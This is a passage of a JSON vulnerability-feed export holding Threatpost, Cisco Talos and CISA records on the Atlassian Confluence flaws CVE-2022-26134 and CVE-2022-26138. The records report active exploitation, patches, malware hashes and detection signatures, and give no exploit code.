Gang Unleash Hacks Against Govt. 
of India", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-15T13:59:37", "id": "THREATPOST:8C179A769DB315AF46676A862FC3D942", "href": "https://threatpost.com/hackers-india-government/179968/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-08T10:28:56", "description": "Threat actors are using public exploits to pummel a critical zero-day remote code execution (RCE) flaw that affects all versions of a popular collaboration tool used in cloud and hybrid server environments and allows for complete host takeover.\n\nResearchers from Volexity uncovered the flaw in Atlassian Confluence Server and Data Center software over the Memorial Day weekend after they detected suspicious activity on two internet-facing web servers belonging to a customer running the software, they said in a [blog post](<https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/>) published last week.\n\n\u201cThe file was a well-known copy of the JSP variant of the China Chopper webshell,\u201d researchers wrote. \u201cHowever, a review of the web logs showed that the file had barely been accessed. 
The webshell appears to have been written as a means of secondary access.\u201d\n\nAtlassian released a [security advisory](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>) the same day that Volexity went public with the flaw, warning customers that all supported versions of Confluence Server and Data Center after version 1.3.0 were affected and that no updates were available. This prompted the U.S. Department of Homeland Security\u2019s Cybersecurity and Infrastructure Security Agency (CISA) to issue [a warning of its own](<https://www.cisa.gov/uscert/ncas/current-activity/2022/06/02/atlassian-releases-security-updates-confluence-server-and-data>) about the flaw.\n\nA day later, Atlassian released fixed versions of the affected products: 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4 and 7.18.1; it\u2019s also strongly recommending that customers update as soon as they can. If that\u2019s not possible, the company provided in the advisory what it stressed is a \u201ctemporary\u201d workaround for the flaw: updating a list of specific files that correspond to specific versions of the product.\n\n## Threat Escalation\n\nIn the meantime, the situation is escalating quickly into one that security professionals said could reach epic proportions, with exploits surfacing daily and hundreds of unique IP addresses already throttling the vulnerability. Many versions of the affected products also remain unpatched, which creates a dangerous situation.\n\n\u201cCVE-2022-26134 is about as bad as it gets,\u201d observed Naveen Sunkavalley, chief architect of security firm [Horizon3.ai](<https://u7061146.ct.sendgrid.net/ls/click?upn=4tNED-2FM8iDZJQyQ53jATUST9fX64-2FX7G8oio3HdExkfpXlsDdy0DMjoZZzh-2Fv3fxrEs2_6bll2uIcECOBsx1gx1IC2zx-2FnKyCXka4AgKvEYqpnW0-2BDbBUicS42bKww9XV5LeOm8YSoCZbw6XkWDSfAMcb8GJOp9iX7pVlW-2BkiIYpN1sif0KFuJYXLhOJYPn-2B9Sn-2Bao84F16BCF9mzWrtMMXrFm85GjE6MDSbjKAOEQgg2YFlHR0Qtls0ZgujFNL07BqN4si4MSOc-2F08z53oSeQi6Vxrf5tVuwdy9pbRo-2F8DNNu3J5mzixD3PJS7t4Hs2TYsOWw0ryNyw1-2BF9EHtf5wuqbWsxGPMD6EQsD7Nyoevetefkt7MGs-2FHajCJChJ0WWQ-2F4es5VBDN8zEwARSv6a1s6u74AUhwTSDRHOo3PP1Q1lKsA-3D>), in an email to Threatpost. Key issues are that the vulnerability is quite easy both to find and to exploit, with the latter possible using a single HTTP GET request, he said.\n\nMoreover, the recently released public exploits allow attackers to use the flaw for arbitrary command execution and host takeover against a number of Confluence versions, including the latest unpatched version, 7.18.0, according to tests that Horizon3.ai has conducted, Sunkavalley said.\n\nIndeed, Twitter was blowing up over the past weekend with discussions about public exploits for the vulnerability. 
On Saturday, Andrew Morris, the CEO of cybersecurity firm [GreyNoise](<https://www.greynoise.io/>)[ tweeted](<https://u7061146.ct.sendgrid.net/ls/click?upn=4tNED-2FM8iDZJQyQ53jATUZeLQXFApkVnt0p2uzldsLzexNPwWwME1VqzuxM4EPRfjhNCvLBy4YB49i5LBdhVDdk3bdxl9mMqYmby3BCNH00GddZh2Met-2FQVciEWaSqj2-2BDc33IvotYb-2FqKipRNwgEsWia58Lavv8WM5npBgeBdYkvQQSrhYbzaBUUuVaSV4Rk2ztpg8TXpsMCaYdZzeKKPgLWVToUg5Ht0f9g7gPwMwtAvcwxVmnWEDON1KFUmdHIfQ-2FKAQvcO7jS7WvGtrxWKAF52KobJgne5rQpdjvE11Y-2B8djmGzI1Q21AzX5T50A9-2BpHIOYzyAUqoUEWZpFnRzzLqrMu3icBZ57LmFKNxGTRPimDUjR7T8eDeQjnWttOekKn_6bll2uIcECOBsx1gx1IC2zx-2FnKyCXka4AgKvEYqpnW0-2BDbBUicS42bKww9XV5LeOm8YSoCZbw6XkWDSfAMcb8GJOp9iX7pVlW-2BkiIYpN1sif0KFuJYXLhOJYPn-2B9Sn-2Bao84F16BCF9mzWrtMMXrFm85GjE6MDSbjKAOEQgg2YFlHR0Qtls0ZgujFNL07BqN4si4MSOc-2F08z53oSeQi6VxpsA5L19rY7-2Fmx-2BEGIHXPubRKCQX-2B7BpbJqtYfPildu8zaULbUO4ygo24RQuqSIch-2BeFoJjwkkjlXG4ACkLuxahlCVA2m3cewG-2B9vzjCwKJ7F5JEpNGn-2FjGZEpkypXKWLD-2BIhk5XHKrarqem-2FZDDkHA-3D>) that they had begun to see 23 unique IP addresses exploiting the Atlassian vulnerabilities. 
On Monday, Morris [tweeted again](<https://twitter.com/Andrew___Morris/status/1533504231876993025>) that the number of unique IP addresses attempting to exploit the flaw had risen to 400 in just a 24-hour period.\n\n## **Potential for a SolarWinds 2.0?**\n\nSunkavalley pointed out that the most obvious impact of the vulnerability is that attackers can easily compromise public-facing Confluence instances to gain a foothold into internal networks, and then proceed from there to unleash even further damage.\n\n\u201cConfluence instances often contain a wealth of user data and business-critical information that is valuable for attackers moving laterally within internal networks,\u201d Sunkavalley said.\n\nWhat\u2019s more, the vulnerability is a source-code issue, and attacks at this level \u201care some of the most effective and long reaching attacks on the IT ecosystem,\u201d observed Garret Grajek, CEO of security firm [YouAttest.](<https://u7061146.ct.sendgrid.net/ls/click?upn=4tNED-2FM8iDZJQyQ53jATUcpjElsOr6shryTSooYkkS1tJo6a6FxvdH5IYSQBxGNY4H_z_6bll2uIcECOBsx1gx1IC2zx-2FnKyCXka4AgKvEYqpnW0-2BDbBUicS42bKww9XV5LeOm8YSoCZbw6XkWDSfAMcb8GJOp9iX7pVlW-2BkiIYpN1sif0KFuJYXLhOJYPn-2B9Sn-2Bao84F16BCF9mzWrtMMXrFm85GjE6MDSbjKAOEQgg2YFlHR0Qtls0ZgujFNL07BqN4si4MSOc-2F08z53oSeQi6VxtVZHvCB0Vt7i-2Bw8BIBLgZxGqzVWH-2B5yvKoY-2FpPXxD7KFogqV9a0rRV2rH4Hj2p6StEDVbzSc-2FkJf66Q9LkeRnRg9qfA-2Fm-2FP06VV5XsA8rTwU9DmqJ3uYX6CQKoNXRKL350M-2FNS011olthdA2Jkl3v0-3D>)\n\nThe now-infamous [Solarwinds supply-chain attack](<https://threatpost.com/solarwinds-default-password-access-sales/162327/>) that started in December 2020 and extended well [into 2021](<https://threatpost.com/solarwinds-hack-linked-turla-apt/162918/>) was an example of the level of damage and magnitude of threat that embedded malware can have, and the Confluence bug has the potential to create a similar scenario, he said.\n\n\u201cBy attacking the source code base the hackers are able to manipulate the code to become, in fact, 
agents of the hacking enterprise, cryptographically registered as legitimate components on the IT system,\u201d Grajek said.\n\nFor this reason, it\u2019s \u201cimperative that enterprises review their code and most importantly the identities that have control of the source system, like Atlassian, to ensure restrictive and legitimate access to their vital code bases,\u201d he asserted.\n", "cvss3": {}, "published": "2022-06-07T11:21:47", "type": "threatpost", "title": "Attackers Use Public Exploits to Throttle Atlassian Confluence Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-07T11:21:47", "id": "THREATPOST:22B3A2B9FF46B2AE65C74DA2E505A47E", "href": "https://threatpost.com/public-exploits-atlassian-confluence-flaw/179887/", "cvss": {"score": 0.0, "vector": "NONE"}}], "talosblog": [{"lastseen": "2022-08-04T19:59:46", "description": "[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLGV0qm1JxU91RjdxVIuHS5qpDp6eR5oqC3GXE4GKh74vcE6eErdX-odGGmldK4seEV08PmWVUMwC9eHiY-MNvEWPJqq7kEe3k9gjAfn0ai-JRQnZ3GdRiAki_wed_Ctz2-MbeTD591fAVRErXhYumK3_GFcUGqEBUmnA_aeVfgK2rZKQ7AW0eYUiY/s2000/threat-source-newsletter.jpg>)\n\n_By Jon Munshaw. _\n\n[](<https://engage2demand.cisco.com/SubscribeTalosThreatSource>)\n\nWelcome to this week\u2019s edition of the Threat Source newsletter. \n\n \n\n\nAfter what seems like forever and honestly has been a really long time, we\u2019re heading back to BlackHat in-person this year. We\u2019re excited to see a lot of old friends again to commiserate, hang out, trade stories and generally talk about security. \n\n \n\n\nThroughout the two days of the main conference, we\u2019ll have a full suite of flash talks at the Cisco Secure booth and several sponsored talks. Since this is the last edition of the newsletter before BlackHat starts, it\u2019s probably worthwhile running through all the cool stuff we\u2019ll have going on at Hacker Summer Camp. 
\n\n \n\n\nOur [booth should be easy enough to find](<https://www.expocad.com/host/fx/ubm/22bhusa/exfx.html>) \u2014 it\u2019s right by the main entrance to Bayside B. If you get to the Trellix Lounge, you\u2019ve gone too far north. Our researchers will be there to answer any questions you have and present on a wide variety of security topics, from research into Adobe vulnerabilities to the privacy effects of the overturn of Roe vs. Wade. Attendees who watch a lightning talk can grab a never-before-seen [Snort 3](<https://snort.org/snort3>)-themed Snorty and our malware mascot stickers, which were a [big hit at Cisco Live this year](<https://twitter.com/TalosSecurity/status/1536821931097305088>). \n\n \n\n\nWe\u2019ll also be over at the Career Center if you want to [come work with us](<https://talosintelligence.com/careers>). Or even if you don\u2019t, word on the street is there\u2019ll be silver and gold Snortys there. And on Thursday the 11th between 10 a.m. and noon local time a Talos hiring manager will be on site reviewing resumes and taking questions. \n\n \n\n\nIf you want more in-depth talks, we\u2019ll have five sponsored sessions between the 10th and 11th. If you want the latest schedule and location on those talks, be sure to [follow us on Twitter](<https://twitter.com/TalosSecurity>) or check out Cisco\u2019s BlackHat event page [here](<https://www.cisco.com/c/en/us/products/security/black-hat-usa.html>). Our sponsored talks cover Talos\u2019 latest work in Ukraine, the growing threat of business email compromise and current trends from state-sponsored actors. Make sure to catch all five of them. \n\n \n\n\nAnd if you liked our speakeasy at Cisco Live, you'll love the next secret we have in store at the BlackHat booth. Swing by and ask us about it. \n\n \n\n\nFor anyone sticking around for DEF CON, we\u2019ll also have a presence there with Blue Team Village. 
Drop any questions in the [Blue Team Village Discord](<https://www.blueteamvillage.org/>) for us, and be sure to attend the BTV Pool Party on Aug. 12 from 8 \u2013 11 p.m. local time. \n\n \n\n\nTo stay up to date on all things Talos at both conferences, be sure to follow us on social media. - \n\n\n \n\n## The one big thing \n\n> \n\n\nCisco Talos recently discovered [a new attack framework called \"Manjusaka\"](<https://blog.talosintelligence.com/2022/08/manjusaka-offensive-framework.html>) being used in the wild that could be the next evolution of Cobalt Strike \u2014 and is even advertised as so. This framework is advertised as an imitation of the Cobalt Strike framework. Although we haven't observed widespread usage of this framework in the wild, it has the potential to be adopted by threat actors all over the world. \n\n\n> ### Why do I care? \n> \n> Our researchers discovered a fully functional version of the command and control (C2), written in GoLang with a User Interface in Simplified Chinese, that\u2019s freely available and can generate new implants with custom configurations with ease. This increases the likelihood of wider adoption of this framework by malicious actors. If you\u2019re a defender of any kind, you want to stay up on the latest tools attackers are likely to use. And since Cobalt Strike is already one of the most widely used out there, it\u2019s safe to assume any evolution of it is going to draw some interest. \n> \n> ### So now what? \n> \n> Organizations must be diligent against such easily available tools and frameworks that can be misused by a variety of threat actors. In-depth defense strategies based on a risk analysis approach can deliver the best results in the prevention of this framework. Talos also released Snort rule 60275 and ClamAV signature Win.Trojan.Manjusaka-9956281-1 to detect the use of Manjusaka. 
\n\n> \n> \n\n## Other news of note\n\n \n\n\nEverything from convenience stores to government websites in Taiwan saw an uptick in cyber attacks this week after U.S. House Speaker Nancy Pelosi visited the country this week. She was the U.S.\u2019 highest-ranking official to visit there in more than 20 years. However, many of the attacks appeared to be from low-skilled attackers and some could even be attributed to a normal uptick in traffic from a busy news day. China could still retaliate for the visit with a cyber attack against Taiwan or the U.S., as the Chinese government has voiced its displeasure over Pelosi\u2019s actions and launched several kinetic warfare exercises. ([Reuters](<https://www.reuters.com/technology/7-11s-train-stations-cyber-attacks-plague-taiwan-over-pelosi-visit-2022-08-04/>), [Washington Post](<https://www.washingtonpost.com/politics/2022/08/03/those-pelosi-inspired-cyberattacks-taiwan-probably-werent-all-they-were-cracked-up-be/>)) \n\nThe U.S. Cybersecurity and Infrastructure Security Agency is warning that attackers are actively exploiting a critical vulnerability in Atlassian Confluence disclosed last week. CISA added CVE-2022-26138, a hardcoded password vulnerability in the Questions for Confluence app, to its list of Known Exploited Vulnerabilities on Friday. Adversaries can exploit this vulnerability to gain total access to data in on-premises Confluence Server and Confluence Data Center platforms. U.S. federal agencies have three weeks to patch for the issue under CISA\u2019s new guidance. ([Dark Reading](<https://www.darkreading.com/cloud/patch-now-atlassian-confluence-bug-active-exploit>), [Bleeping Computer](<https://www.bleepingcomputer.com/news/security/cisa-warns-of-critical-confluence-bug-exploited-in-attacks/>)) \n\nNorth Korean state-sponsored actors continue to be active, recently adding a new Gmail attack to its arsenal. 
The infamous SharpTongue group uses the SHARPEXT malware to target organizations in the U.S., Europe and South Korea that work on nuclear weapons and other topics that North Korea sees as relevant to its national security. SHARPEXT installs a Google Chrome extension that allows the attackers to bypass users\u2019 Gmail multi-factor authentication and passwords, eventually entering the inbox and reading and downloading email and attachments. Other North Korean actors continue to use fake LinkedIn applications to apply for remote jobs, hoping to eventually steal cryptocurrency and fund the country\u2019s weapons program. ([Ars Technica](<https://arstechnica.com/information-technology/2022/08/north-korea-backed-hackers-have-a-clever-way-to-read-your-gmail/>), [Bloomberg](<https://www.bloomberg.com/news/articles/2022-08-01/north-koreans-suspected-of-using-fake-resumes-to-steal-crypto>)) \n\n \n\n\n## Can\u2019t get enough Talos? \n\n * _[Talos Takes Ep. #106: The top attacker trends from the past quarter](<https://talosintelligence.com/podcasts/shows/talos_takes/episodes/106>)_\n * _[Beers with Talos Ep. 
#124: There's no such thing as \"I have nothing to hide\"](<https://talosintelligence.com/podcasts/shows/beers_with_talos/episodes/124>)_\n * _[BlackHat \u2014 A poem](<https://blog.talosintelligence.com/2022/08/poems-0xCCd.html>)_\n * _[Vulnerability Spotlight: Vulnerabilities in Alyac antivirus program could stop virus scanning, cause code execution](<https://blog.talosintelligence.com/2022/05/vuln-spotlight-alyac-est.html>)_\n * _[Vulnerability Spotlight: How misusing properly serialized data opened TCL LinkHub Mesh Wi-Fi system to 17 vulnerabilities](<https://blog.talosintelligence.com/2022/08/vulnerability-spotlight-how-misusing.html>)_\n * _[Researcher Spotlight: You should have been listening to Lurene Grenier years ago](<https://blog.talosintelligence.com/2022/08/researcher-spotlight-you-should-have.html>)_\n * _[Manjusaka, a new attack tool similar to Sliver and Cobalt Strike](<https://securityaffairs.co/wordpress/133953/hacking/manjusaka-attack-tool.html>)_\n\n \n\n\n## Upcoming events where you can find Talos \n\n#### \n\n\n[**BlackHat**](<https://www.blackhat.com/us-22/>) **U.S.A 2022 **(Aug. 6 - 11, 2022) \nLas Vegas, Nevada \n\n \n\n\n_[USENIX Security '22](<https://www.usenix.org/conference/usenixsecurity22#registration>) _**(Aug. 10 - 12, 2022)** \nLas Vegas, Nevada \n\n \n\n\n**[DEF CON U.S.](<https://defcon.org/>) **(Aug. 11 - 14, 2022) \nLas Vegas, Nevada \n\n \n\n\n**[Security Insights 101 Knowledge Series](<https://aavar.org/securityinsights101/>) (Aug. 
25, 2022)**\n\nVirtual \n\n \n\n\n## Most prevalent malware files from Talos telemetry over the past week \n\n** \n**\n\n**SHA 256: **[e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934](<https://www.virustotal.com/gui/file/e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934/details>)** \n****MD5: **93fefc3e88ffb78abb36365fa5cf857c ** \n****Typical Filename: **Wextract \n**Claimed Product: **Internet Explorer \n**Detection Name: **PUA.Win.Trojan.Generic::85.lp.ret.sbx.tg \n\n \n\n\n**SHA 256: **[125e12c8045689bb2a5dcad6fa2644847156dec8b533ee8a3653b432f8fd5645](<https://www.virustotal.com/gui/file/125e12c8045689bb2a5dcad6fa2644847156dec8b533ee8a3653b432f8fd5645/details>) ** **\n\n**MD5: **2c8ea737a232fd03ab80db672d50a17a \n\n**Typical Filename:** LwssPlayer.scr \n\n**Claimed Product: **\u68a6\u60f3\u4e4b\u5dc5\u5e7b\u706f\u64ad\u653e\u5668 \n\n**Detection Name: **Auto.125E12.241442.in02 \n\n \n\n\n**SHA 256:** [f21b040f7c47d8d3d9c1f0ef00f09e69f2c3f0e19d91988efc0ddd4833ced121](<https://www.virustotal.com/gui/file/f21b040f7c47d8d3d9c1f0ef00f09e69f2c3f0e19d91988efc0ddd4833ced121/details>) \n\n**MD5:** 9066dff68c1d66a6d5f9f2904359876c \n\n**Typical Filename:** dota-15_id3622928ids1s.exe \n\n**Claimed Product:** N/A \n\n**Detection Name:** W32.F21B040F7C.in12.Talos \n\n \n\n\n**SHA 256: **[e12b6641d7e7e4da97a0ff8e1a0d4840c882569d47b8fab8fb187ac2b475636c](<https://www.virustotal.com/gui/file/e12b6641d7e7e4da97a0ff8e1a0d4840c882569d47b8fab8fb187ac2b475636c/details>) ** **\n\n**MD5:** a087b2e6ec57b08c0d0750c60f96a74c \n\n**Typical Filename: **AAct.exe ** **\n\n**Claimed Product:** N/A ** **\n\n**Detection Name: **PUA.Win.Tool.Kmsauto::1201** **\n\n** \n**\n\n**SHA 256: **[168e625c7eb51720f5ce1922aec6ad316b3aaca838bd864ee2bcdbd9b66171d0](<https://www.virustotal.com/gui/file/168e625c7eb51720f5ce1922aec6ad316b3aaca838bd864ee2bcdbd9b66171d0/details>) \n\n**MD5: **311d64e4892f75019ee257b8377c723e \n\n**Typical Filename: **ultrasurf-21-32.exe ** 
**\n\n**Claimed Product: **N/A \n\n**Detection Name: **W32.DFC.MalParent", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-04T18:00:00", "type": "talosblog", "title": "Threat Source newsletter (Aug. 4, 2022) \u2014 BlackHat 2022 preview", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-26138"], "modified": "2022-08-04T18:00:00", "id": "TALOSBLOG:1CC8B88D18FD4407B2AEF8B648A80C27", "href": "http://blog.talosintelligence.com/2022/08/threat-source-newsletter-aug-4-2022.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "cisa": [{"lastseen": "2022-08-05T13:56:42", "description": "Atlassian has released a security advisory to address a vulnerability (CVE-2022-26138) affecting Questions for Confluence App. An attacker could exploit this vulnerability to obtain sensitive information. Atlassian reports that the vulnerability is likely to be exploited in the wild.\n\nCISA encourages users and administrators to review Atlassian\u2019s security advisory, [Questions For Confluence Security Advisory 2022-07-20](<https://confluence.atlassian.com/doc/questions-for-confluence-security-advisory-2022-07-20-1142446709.html>), and apply the necessary updates immediately. 
\n\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2022/07/22/atlassian-releases-security-advisory-questions-confluence-app-cve>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-22T00:00:00", "type": "cisa", "title": "Atlassian Releases Security Advisory for Questions for Confluence App, CVE-2022-26138", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-26138"], "modified": "2022-07-22T00:00:00", "id": "CISA:B99FA8E68B4D7FF5BA1F6693AC9C7CCF", "href": "https://us-cert.cisa.gov/ncas/current-activity/2022/07/22/atlassian-releases-security-advisory-questions-confluence-app-cve", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-07-01T13:56:33", "description": "Atlassian has released new Confluence Server and Data Center versions to address [remote code execution vulnerability CVE-2022-26134](<https://www.cisa.gov/uscert/ncas/current-activity/2022/06/02/atlassian-releases-security-updates-confluence-server-and-data>) affecting these products. An unauthenticated remote attacker could exploit this vulnerability to execute code remotely. 
Atlassian reports that there is known exploitation of this vulnerability.\n\nCISA strongly urges organizations to review [Confluence Security Advisory 2022-06-02](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>) and upgrade Confluence Server and Confluence Data Center.\n\n**Note:** per [BOD 22-01 Catalog of Known Exploited Vulnerabilities](<https://www.cisa.gov/binding-operational-directive-22-01>), federal agencies are required to immediately block all internet traffic to and from Atlassian\u2019s Confluence Server and Data Center products AND either apply the software update to all affected instances OR remove the affected products by 5 pm ET on Monday, June 6, 2022.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2022/06/03/atlassian-releases-new-versions-confluence-server-and-data-center>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-03T00:00:00", "type": "cisa", "title": "Atlassian Releases New Versions of Confluence Server and Data Center to Address CVE-2022-26134", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", 
"availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-30T00:00:00", "id": "CISA:9E73FFA29BFAFFF667AC400A87F5434E", "href": "https://us-cert.cisa.gov/ncas/current-activity/2022/06/03/atlassian-releases-new-versions-confluence-server-and-data-center", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-15T14:02:20", "description": "CISA has added one new vulnerability\u2014[CVE-2022-26134](<https://www.cisa.gov/uscert/ncas/current-activity/2022/06/02/atlassian-releases-security-updates-confluence-server-and-data>)\u2014to its [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>), based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise. Note: to view the newly added vulnerabilities in the catalog, click on the arrow on the of the \"Date Added to Catalog\" column, which will sort by descending dates. \n\nThere are currently no updates available. Atlassian is working to issue an update. Per BOD 22-01 Catalog of Known Exploited Vulnerabilities, federal agencies are required to immediately block all internet traffic to and from Atlassian\u2019s Confluence Server and Data Center products until an update is available and successfully applied.\n\n[Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities](<https://www.cisa.gov/binding-operational-directive-22-01>) established the Known Exploited Vulnerabilities Catalog as a living list of known CVEs that carry significant risk to the federal enterprise. 
BOD 22-01 requires FCEB agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the [BOD 22-01 Fact Sheet](<https://cisa.gov/sites/default/files/publications/Reducing_the_Significant_Risk_of_Known_Exploited_Vulnerabilities_211103.pdf>) for more information. \n\nAlthough BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of [Catalog vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the Catalog that meet the meet the [specified criteria](<https://www.cisa.gov/known-exploited-vulnerabilities>). \n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2022/06/02/cisa-adds-one-known-exploited-vulnerability-cve-2022-26134-catalog>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-02T00:00:00", "type": "cisa", "title": "CISA Adds One Known Exploited Vulnerability (CVE-2022-26134) to Catalog\u202f\u202f ", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": 
{"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-02T00:00:00", "id": "CISA:695499EEB6D0CB5B73EEE7BCED9FD497", "href": "https://us-cert.cisa.gov/ncas/current-activity/2022/06/02/cisa-adds-one-known-exploited-vulnerability-cve-2022-26134-catalog", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-15T14:02:20", "description": "Atlassian has released a security advisory to address a remote code execution vulnerability (CVE-2022-26134) affecting Confluence Server and Data Center products. An unauthenticated remote attacker could exploit this vulnerability to execute code remotely. Atlassian reports that there is known exploitation of this vulnerability.\n\nThere are currently no updates available. Atlassian is working to issue an update. CISA strongly recommends that organizations review [Confluence Security Advisory 2022-06-02](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>) for more information. 
CISA urges organizations with affected Atlassian\u2019s Confluence Server and Data Center products to block all internet traffic to and from those devices until an update is available and successfully applied.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2022/06/02/atlassian-releases-security-updates-confluence-server-and-data>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-02T00:00:00", "type": "cisa", "title": "Atlassian Releases Security Advisory for Confluence Server and Data Center, CVE-2022-26134", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": 